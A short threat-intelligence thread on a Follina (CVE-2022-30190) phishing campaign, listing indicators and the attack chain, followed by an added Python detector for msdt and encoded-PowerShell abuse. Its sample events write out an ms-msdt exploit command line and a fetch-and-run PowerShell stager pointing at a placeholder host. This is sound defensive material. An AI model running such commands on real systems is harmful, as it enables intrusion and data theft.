Proofpoint blocked a suspected state-aligned phishing campaign targeting fewer than 10 Proofpoint customers (European gov & local US gov) attempting to exploit #Follina / #CVE_2022_30190.
This campaign masqueraded as a salary increase and utilized an RTF (242d2fa02535599dae793e731b6db5a2) with the exploit payload downloaded from 45.76.53[.]253.
The downloaded PowerShell script was base64 encoded and used Invoke-Expression to download an additional PS script (dbd2b7048b3321c87a768ed7581581db) from seller-notification[.]live.
This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil to 45.77.156[.]179.
While Proofpoint suspects this campaign to be by a state-aligned actor based on both the extensive recon of the PowerShell and the tight concentration of targeting, we do not currently attribute it to a numbered TA.
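As an added detection example (not Proofpoint's code and not part of the thread), the following Python scans constructed process-creation events for the two stages described above: msdt.exe launched from an Office process with an ms-msdt: URI, which is the publicly documented CVE-2022-30190 pattern and an assumption here, and a base64-encoded PowerShell command line that decodes to an Invoke-Expression downloader. The process names, rule strings, sample events and the placeholder URL are all assumptions.

```python
import base64
import re

# Added example, not Proofpoint's code. Process names and the ms-msdt: handler are
# assumptions taken from public CVE-2022-30190 descriptions; the URL is a placeholder.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
STAGER_RE = re.compile(r"Invoke-Expression|\bIEX\b|DownloadString|DownloadFile", re.I)

def encode_ps(script: str) -> str:
    # powershell.exe -EncodedCommand expects base64 over UTF-16LE text
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmd: str):
    # Returns the decoded -EncodedCommand payload, or None if absent or undecodable
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event: dict) -> list:
    # Suspicious traits of one process-creation event (parent, image, command line)
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmd"]
    hits = []
    if image == "msdt.exe" and parent in OFFICE_PARENTS:
        hits.append("msdt.exe spawned by an Office process")
    if "ms-msdt:" in cmd.lower():
        hits.append("ms-msdt: URI on the command line")
    decoded = decode_encoded_command(cmd) if image == "powershell.exe" else None
    if decoded and STAGER_RE.search(decoded):
        hits.append("encoded PowerShell stager using Invoke-Expression/download")
    return hits

def scan(events: list) -> dict:
    # Map event index -> findings for every event that triggers at least one rule
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}

# Constructed sample telemetry (not from the campaign); event 1 carries an encoded stager
STAGER = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
EVENTS = [
    {"parent": "WINWORD.EXE", "image": "msdt.exe",
     "cmd": 'msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "<placeholder>"'},
    {"parent": "msdt.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -EncodedCommand " + encode_ps(STAGER)},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmd": "powershell.exe -File backup.ps1"},
]
```

Calling scan(EVENTS) flags events 0 and 1 and leaves the ordinary -File invocation alone.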